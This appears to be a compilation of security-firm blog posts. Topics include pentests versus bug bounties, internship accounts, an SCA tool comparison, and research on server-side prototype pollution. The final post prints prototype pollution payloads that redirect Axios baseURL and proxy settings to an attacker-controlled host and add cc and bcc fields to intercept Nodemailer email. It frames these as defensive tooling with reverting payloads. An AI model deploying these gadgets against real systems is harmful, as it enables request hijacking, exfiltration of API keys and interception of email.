ABOUT US

We are security engineers who break bits and tell stories.

© 2026 Doyensec LLC

Every so often we see people discussing whether they still need to have product security audits (commonly referred to as pentests) because they have a bug bounty program. While the answer to this seems clear to us, it nonetheless is a recurring topic of discussion, particularly in the information security corners of social media. We’ve decided to publish our thoughts on this topic to clarify it for those who might still be unsure.

What we refer to as a product security audit is a time-bound project, where one or more engineers focus on a particular application exclusively. The testing is performed by employees of an application security firm. This work is usually scoped ahead of time and billed at flat hourly/daily rates, with the total cost known to the client prior to commencing.

These can be white box (i.e., access to source code and documentation) or black box (i.e., no source code access, with or without documentation), or somewhere in the middle. There is usually a well-defined scope and often preliminary discussions on points of interest to investigate more closely than others. Frequently, there will also be a walkthrough of the application’s functionality. More often than not, the testing takes place in a predefined set of days and hours. This is typically when the client is available to respond to questions, react in the event of potential issues (e.g., a site going down) or possibly to avoid peak traffic times.

Because of the trust that clients have in professional firms, they will often permit them direct access to their infrastructure and code, something that is rarely done in a bug bounty program. This empowers the testers to find bugs that are potentially very difficult to find externally and things that may be out of scope for dynamic tests, such as denial-of-service vulnerabilities. Additionally, with this approach, it’s common to discover one vulnerability and then, thanks to the access to the code, quickly establish that it’s a systemic issue. With this access, it is also much easier to identify things like vulnerable dependencies, often buried deep in the application.

Once the testing is complete, the provider will usually supply a written report and may have a wrap-up call with the client. There may also be a follow-up (retest) to ensure a client’s attempts at remediation have been successful.

What is most commonly referred to as a bug bounty program is typically an open-ended, ongoing effort where the testing is performed by the general public. Some companies may limit participation to a smaller group, selected on whatever criteria they wish, with past performance in other programs being a commonly used factor.

Most programs define a scope of things to be tested and the vulnerability types that they are interested in receiving reports on. The client typically sets the payout amounts they are offering, with escalating rewards for more impactful discoveries. The client is also free to incentivize testing on certain areas through promotions (e.g., double bounties on their new product). Most bug bounty programs are exclusively black box, with no source code or documentation provided to the participating testers.

In most programs, there are no limits as to when the testing occurs. The participants determine if and when they perform testing. Because of this, any outages caused by the testing are usually treated as either normal engineering outages or potentially as security incidents. Some programs do ask their testers to identify their traffic via various means (e.g., passing a unique header) to more easily understand what they’re seeing in logs, if questions arise.

The bug bounty program’s concept of reporting is commonly individual bug reports, with or without a pre-formatted submission form. It is also common for programs to request that the person submitting the report validate the fix.

While not the focus of this post, we felt it was necessary to also acknowledge that there are hybrid approaches available. These offerings combine various aspects of both a bug bounty program and focused product security audits. We hope this post will inform the reader well enough to ensure they select the approach and mix of services that is right for their organization and fully understand what each entails.

From the definitions, the two approaches seem reasonably similar, but when we go below the surface, the differences become more apparent.

It’s not fair to paint any group with a broad brush, but there are some clear differences between who typically works in a product security audit versus a bug bounty program. Both approaches can result in great people testing an application and both could potentially result in participants lacking the professionalism and/or skill set you hoped for.

When a firm is retained to perform testing for a client, the firm is staking their reputation on the client’s satisfaction. Most reputable firms will attempt to provide clients with the best people they have available, ideally considering their specific skills for the engagement. The firm assumes the responsibility to screen their employees’ technical abilities, usually through multiple rounds of testing and interviewing prior to hiring, along with ongoing supervision, training and mentoring. Clients are also often provided with summaries of the engineers’ résumés, with the option to request alternate testers, if they feel their background doesn’t match with the project. Lastly, providers are also usually required to perform criminal background checks on their staff to meet client requirements.

A bug bounty program usually has very minimal entry requirements. Typically this just means that the participants are not from embargoed countries. Participants could be anyone from professionals looking to make extra money, security researchers, college students or even complete novices looking to build a résumé. While theoretically a client may draw more eyes to their project than in a typical audit, that’s not guaranteed and there are no assurances of their qualifications. Katie Moussouris, a well-known CEO of a bug bounty consultancy, is quoted underscoring this point, saying “Their latest report shows most registered users are basically either fake or unskilled”. Further, per their own statistics, one of the largest platforms stated that only about one percent of their participants “were really doing well”. So, despite large potential numbers, the small percentage of productive participants will be stretched thin across thousands of programs, at best. In reality, the top participants tend to aggregate around programs they feel are the most lucrative or interesting.

When a client hires a quality firm to perform a product security audit, they’re effectively getting that firm’s collective body of knowledge. This typically means that their personnel have others within the company they can interact with if they encounter problems or need assistance. This also means that they likely have a proprietary methodology they adhere to, so clients should expect thorough and consistent results. Internal peer review and other quality assurance processes are also usually in place to ensure satisfactory results.

Generally, there are limitations on what a client wants or is able to share externally. It is common that a firm and client sign mutual NDAs, so neither party is allowed to disclose information about the audit. Should the firm leak information, they can potentially be held legally liable.

In a bug bounty program, each tester makes their own rules. They may overlap each other, creating redundant tests, or they may complement each other, giving the presumed advantage of many eyes. There is generally no way for a client to know what has or has not been tested. Clients may also find test accounts and data littered throughout the app (e.g., pop-up alerts everywhere), whereas professional testers are typically more restrained and required to not leave such remnants.

Most bug bounty programs don’t require a binding NDA, even if they are considered “private”. Therefore, clients are faced with a decision as to what and how much to share with the program participants. As a practical matter, there is little recourse if a participant decides to share information with others.

When a client hires a firm, they should expect a well-written professional report. Most firms have a proprietary reporting format, but will usually also provide a machine-readable report upon request. In most cases, clients can preview a sample report prior to hiring a firm, so they can get a very clear picture of the deliverables.

Reports from professional audits are typically subjected to several rounds of quality control prior to being delivered to clients. This will typically include a technical review or validation of reported issues, in addition to language and grammar editing to ensure reports are readable and professionally constructed. Additionally, quality firms understand that the results may be reviewed by a wide audience at their clients. They will therefore invest the time and effort to construct them in such a way that readers with a wide range of technical knowledge are all able to understand the results. Testers are also typically required to maintain testing logs and quality documentation of all issues (e.g., screenshots, including requests and responses). This ensures clear findings reports and reproduction steps along with all the supporting materials.

Through personalized relationships with clients and potentially their source code, firms have the opportunity to understand what is important to them, which things keep them up at night and which things they aren’t concerned about. Through kickoff meetings, ongoing direct communication and wrap-up meetings, firms build trust and understanding with clients. This allows them to look at vulnerabilities of all severity levels and understand the context for the client. This could result in simply saving the client’s time or recognizing when a medium severity issue is actually a critical issue, for that client’s organization.

Further, repeated testing allows a client to tangibly demonstrate their commitment to security and how quickly they remediate issues. Additionally, product security audits conducted by experienced engineers, especially those with source code access, can highlight long-term improvements and hardening measures that can be taken, which would not generally be a part of a bug bounty program’s reports.

In a bug bounty program, the results are unpredictable, often seemingly driven mainly by the participants’ focus on payouts. Most companies end up inundated with effectively meaningless reports. Whether valid or not, they are often unrealistic, overhyped, known CVEs or previously known bugs, or issues the organization doesn’t actually care about. It is rare that results fully meet expectations, but not impossible. Submissions tend to cluster at two extremes. At one end are issues pushed (often quite imaginatively) to be considered critical or high severity, to gain the largest payouts. At the other is the low-hanging fruit detected by automated scanners, usually reported by lower-rated participants looking for any type of payout, no matter how trivial. The reality is that clients need to pay a premium to get the “good researchers” to participate, but on public programs that itself can also cause a significant uptick in “spam” reports.

Bug bounty reports are typically not formatted in a consistent manner and not machine-readable for ingestion into defect tracking software. Historically, there have been numerous issues that have arisen from reports which were difficult to triage due to language issues, poor grammar or bad proof-of-concept media (e.g., unhelpful screenshots, no logs, meandering videos). To address this, some platforms have gone as far as to incentivize participants to provide clear and easily readable reports via increased payouts, or positive reviews which impact the reporters’ reputation scores.

A professional audit is something that produces a deliverable that a client can hand to a third-party, if necessary. While there is a fixed cost for it, regardless of the results, this documented testing is often required by partner companies and for compliance reasons. Furthermore, when using a reputable firm, a client may find it easier to pass the security requirements of their partners. Lastly, should there be an incident, a client can attest to their due diligence and potentially lessen their legal liability.

A bug bounty provides no assurances as to the amount of the application that is tested (i.e., the “coverage”). It neither produces an acceptable deliverable that can be offered to third parties, nor does it attest to the quality of the skills of those testing the application(s). Further, bug bounty programs typically don’t satisfy compliance requirements for security testing.



In the following table, we perform a side-by-side comparison of the two approaches to make the differences clearer.

Which approach an organization decides to take will vary based on many factors including budget, compliance requirements, partner requirements, time-sensitivity and confidentiality requirements. For most organizations, we feel the correct approach is a balanced one.

Ideally, an organization should perform recurring product security audits at least quarterly and after major changes. If budgets don’t permit that frequency of testing, the typical compromise is annually, at an absolute minimum.

Bug bounty programs should be used to fill the gaps between rigorous security audits, whether those audits are performed by internal teams or external partners. This is arguably the need they were designed to fill, rather than replacing recurring professional testing.

The following blog post gives a voice to our 2023 interns and their experiences with us.

During my last year of high school I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity, via lessons and CTF competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from the south of Italy to Pisa, to study at the university, I joined the fibonhack CTF team. I then also started working as a developer and penetration tester on small projects, both inside the university and outside.

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I also wanted to try a job in the research field. This was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

The main research topic of my internship experience was about developing internal tools. Although this project was not mainly about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

It is important to note that even though you are the last one who has joined the company and have limited experience, all Doyensec team members treat you like all other employees. You could be in charge of actually talking with the client if you have any issues during an assessment, you will have to write and possibly peer review the reports, you will have to evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers that will guide you through the process (Lorenzo in my case - who I would like to thank for helping me in managing the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing and making your own decisions on how to proceed and of course making errors.

To me this was a mind-blowing feeling. I did not expect to be fully part of the team, or that my opinions would matter. It was really a good approach, in my opinion. It took me a while to fit entirely into the role, but then it was fun all along the way.

Hi, my name is Leonardo. Some of you may know me better as maitai, which is the handle that I’ve been using in the CTF scene from the start of my journey. I encountered cybersecurity while earning my Bachelor of Science in computer science. From the very first moment I was amazed by it. So I decided to dig a bit more into hacking, starting with the PortSwigger Academy, which literally changed my life.

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was made aware of the next steps in the interview process. First of all, the technical challenges used during the process were brand new. The Practice Manager told me that Doyensec had entirely replaced the old challenges and moved them to a brand new platform. I was essentially the first candidate to ever use this new platform.

The topics of the challenges were mostly web applications in several different languages, with different bugs to spot, alongside mobile challenges that involved the use of state-of-the-art technologies. I had 2 hours to complete as many challenges as I could, from a pool of 8. The time constraint was right in my opinion. You have around 15 minutes per challenge, which is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit in order to find as many bugs as possible and eventually to pass on to the next steps of the interview process. It was later explained to me that the review of numerous (but short) code snapshots in a limited time-frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities, to how to patch vulnerable code. It was a 360 degree interview. It also included some live code review. The interview lasted for an hour or so, and in the end Luca said that he would evaluate my performance and let me know. The day after, another email arrived. I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted for an hour. At this point, I had completed the whole process. I only needed to wait for their response, which didn’t take too long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also need to hold some meetings during the day, in order to synchronize on different things that can happen during the penetration test. Communication is a key part of Doyensec, and from great communication come great bugs.

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open source project: I was tasked with writing some plugins for Tsunami, Google’s security scanner. This is a general purpose network security scanner, with an extensible plugin system for detecting high severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it that can be used to confirm its existence when scanning. I was assigned to write two plugins which detect weak credentials on the RabbitMQ Management Portal and RStudio server. The plugins are written in Java, and since I’ve done a bit of Java programming during my Bachelor’s degree program I felt quite confident about it.

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

As Aleandro already explained, interns are given a lot of responsibilities along with a great sense of freedom at Doyensec. I would add just one thing, which is about time management. This is one of the most difficult things for me to do. In a remote company, you don’t have time clocks or similar, so you can choose to work the way that you prefer. Luca told me several times that at Doyensec the output is what is evaluated. This is a big thing for me to deal with since I was used to working a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which, for me, is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are so enjoyable.

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

In the end, you should consider applying for the next call for interns, if you:

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capabilities to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).



Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications with cloud components, and the last is integrated into the GitHub(.com) environment directly. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regard to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

You will find the results of this latest analysis here on our research page. Included in that whitepaper, we describe the process taken to develop the testing corpus and our methodology. In short, the aim was to determine which tool could provide the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. This scenario was thought to be the optimal real-world scenario for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempts at implementing deployment blocking as a result of CI/CD testing are unlikely to tolerate more than a minimal amount of false positives.
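To make the selection criterion above concrete, here is a minimal sketch that computes the share of a tool's reported findings that turn out to be real after triage. The tool names, the counts and the `actionableShare` helper are all made up for illustration; they are not results or code from the whitepaper.

```javascript
// Hypothetical triage counts; these are NOT results from the whitepaper.
const triageResults = [
  { tool: "tool-a", truePositives: 36, falsePositives: 4 },
  { tool: "tool-b", truePositives: 60, falsePositives: 140 },
];

// Share of reported findings that were real issues after manual triage.
// False negatives are deliberately ignored, mirroring the criterion above.
function actionableShare({ truePositives, falsePositives }) {
  const reported = truePositives + falsePositives;
  return reported === 0 ? 0 : truePositives / reported;
}

for (const result of triageResults) {
  const percent = (actionableShare(result) * 100).toFixed(0);
  console.log(`${result.tool}: ${percent}% of reported findings were actionable`);
}
```

In this made-up example, the second tool surfaces more real issues in absolute terms, but a team would have to triage far more noise per useful finding, which is the cost the paragraph above describes.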

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at info@doyensec.com.

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

    // Example of prototype pollution in a browser console
    Object.prototype.isAdmin = true;
    const user = {};
    console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

    // Example of recursive assignment leading to prototype pollution
    function merge(target, source) {
      for (let key in source) {
        if (typeof source[key] === 'object') {
          if (!target[key]) target[key] = {};
          merge(target[key], source[key]);
        } else {
          target[key] = source[key];
        }
      }
    }
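As a minimal sketch of how such a recursive merge becomes a source, the snippet below feeds it attacker-shaped JSON. The `merge` function is repeated so the example runs on its own; the `polluted` property name and the `demoMergePollution` helper are made up for illustration.

```javascript
// Same vulnerable recursive merge as above, repeated so this runs standalone.
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object') {
      if (!target[key]) target[key] = {};
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
}

// Hypothetical helper, used only for this illustration.
function demoMergePollution() {
  // JSON.parse creates an own property literally named "__proto__".
  const attackerInput = JSON.parse('{"__proto__": {"polluted": "yes"}}');
  try {
    // target["__proto__"] resolves to Object.prototype, so the merge writes there.
    merge({}, attackerInput);
    // A brand new, unrelated object now inherits the injected property.
    const fresh = {};
    return fresh.polluted;
  } finally {
    // Clean up so the rest of the process is unaffected.
    delete Object.prototype.polluted;
  }
}

console.log(demoMergePollution()); // "yes"
```

The `finally` block matters even in a demo: without it, every object created afterwards in the same process would keep inheriting the injected property.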

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.





Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Prototype Pollution Gadgets Finder, available on GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{

"user": "example",

"auth": false

}

The plugin would attempt various poisonings, such as:

{

"user": {"__proto__": <polluted_object>},

"auth": false

}

or:

{

"user": "example",

"auth": {"__proto__": <polluted_object>}

}
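The enumeration above can be sketched in a few lines of JavaScript. This is a minimal illustration, not the plugin's actual code: the helper name `poisonedVariants` and the `collaborator.example` host are assumptions, and only top-level fields are handled.

```javascript
// Hypothetical helper: return one serialized request body per top-level field,
// with that field's value replaced by a {"__proto__": ...} carrier.
function poisonedVariants(body, pollutedObject) {
  // Build the carrier through JSON.parse so "__proto__" becomes an ordinary
  // own key. An object literal would set the prototype instead.
  const carrierJson = `{"__proto__":${JSON.stringify(pollutedObject)}}`;
  return Object.keys(body).map((key) => {
    const variant = { ...body, [key]: JSON.parse(carrierJson) };
    return JSON.stringify(variant);
  });
}

const variants = poisonedVariants(
  { user: "example", auth: false },
  { baseURL: "https://collaborator.example" } // placeholder polluted object
);

for (const v of variants) {
  console.log(v);
}
```

Building the carrier with `JSON.parse` matters here: writing `{ __proto__: x }` as a literal would change the object's prototype, and the key would be dropped when the body is serialized.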

Our decision to create a new plugin, rather than relying solely on custom checks (BChecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by practical necessity. These tools, while powerful at detection, do not automatically revert the modifications made during the detection process. Because some gadgets can adversely affect the system or alter application behavior, our plugin removes each poisoning after testing it. This step keeps the testing process from compromising the application’s functionality or stability.

Furthermore, all gadgets introduced by the plugin operate out-of-band (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be detected once the application interacts with the poisoned prototype.

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{

"payload": {"<parameter>": "<URL>"},

"description": "<Description>",

"null_payload": {"<parameter>": {}}

}

In payload, the <URL> placeholder is where the URL of the collaborator is inserted. The null_payload reverts the modifications made by payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.
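As a rough sketch of how a gadget entry in this format might be turned into a poisoning body and its matching clean-up body, consider the following. The helpers `fillUrl` and `asPollution` and the host `abc123.collab.example` are hypothetical and are not taken from the plugin's source.

```javascript
// A gadget entry in the format described above.
const gadget = {
  payload: { baseURL: "https://<URL>" },
  description: "Modifies 'baseURL', leading to SSRF or sensitive data exposure.",
  null_payload: { baseURL: {} },
};

// Hypothetical helper: substitute every "<URL>" placeholder with the collaborator host.
function fillUrl(payload, collaboratorHost) {
  return JSON.parse(JSON.stringify(payload).replaceAll("<URL>", collaboratorHost));
}

// Hypothetical helper: wrap a payload in a "__proto__" carrier, as a JSON string.
function asPollution(payload) {
  return `{"__proto__":${JSON.stringify(payload)}}`;
}

// The host below is an assumed stand-in for a generated collaborator domain.
const poison = asPollution(fillUrl(gadget.payload, "abc123.collab.example"));
const cleanup = asPollution(gadget.null_payload);

console.log(poison);
console.log(cleanup);
```

Sending `poison` first and `cleanup` afterwards mirrors the poison-then-revert sequence described earlier.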

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

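app.get("/get-api-key", async (req, res) => {

try {

const instance = axios.create({baseURL: "https://doyensec.com"});

const response = await instance.get("/?api-key=<API_KEY>");

res.send(response.data);

} catch (error) {

// A try block needs a catch; report the failed upstream request

res.status(500).send("500!");

}

});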

Gadget Explanation: Manipulating the baseURL parameter redirects HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. Poisoning the proxy parameter could reroute outgoing HTTP requests through an attacker-controlled proxy. Burp Collaborator cannot act as a proxy to capture or manipulate these requests directly, but it can detect DNS lookups initiated by the application. Observing DNS requests to domains we control after poisoning the proxy configuration indicates that the application accepted the poisoned configuration, without the need to observe proxy traffic. From this we can infer that, with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to intercept and manipulate the HTTP communications, demonstrating the vulnerability’s potential exploitability.

{

"payload": {"baseURL": "https://<URL>"},

"description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",

"null_payload": {"baseURL": {}}

},

{

"payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},

"description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",

"null_payload": {"proxy": {}}

}
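To illustrate why a polluted baseURL can reach an outgoing request, here is a self-contained sketch. It is not Axios's code: `resolveUrl` is a simplified stand-in for a client that reads an optional setting, `unsafeMerge` is a deliberately vulnerable merge acting as the pollution source, and `attacker.example` is a placeholder domain.

```javascript
// Simplified stand-in for an HTTP client reading an optional setting.
// NOT Axios's implementation; it only mimics the property lookup pattern.
function resolveUrl(config, path) {
  // If baseURL is not an own property, the lookup falls through to Object.prototype.
  return (config.baseURL || "") + path;
}

// Deliberately vulnerable recursive merge (hypothetical pollution source).
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === "object") {
      if (typeof target[key] !== "object" || target[key] === null) {
        target[key] = {};
      }
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

const before = resolveUrl({}, "/?api-key=SECRET");

// JSON.parse keeps "__proto__" as an ordinary own key, as a JSON body parser would.
unsafeMerge({}, JSON.parse('{"__proto__":{"baseURL":"https://attacker.example"}}'));
const during = resolveUrl({}, "/?api-key=SECRET");

// Local clean-up so this demo does not leave the process polluted.
delete Object.prototype.baseURL;
const after = resolveUrl({}, "/?api-key=SECRET");

console.log({ before, during, after });
```

While the prototype is polluted, a config object that never set baseURL still resolves against the attacker's host. That is the behavior the gadget relies on.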

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

transporter.sendMail(mailOptions, (error, info) => {

if (error) {

res.status(500).send('500!');

} else {

res.send('200 OK');

}

});

Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communication.

{

"payload": {"cc": "email@<URL>"},

"description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",

"null_payload": {"cc": {}}

},

{

"payload": {"bcc": "email@<URL>"},

"description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",

"null_payload": {"bcc": {}}

}

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying new gadgets and sharing them. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.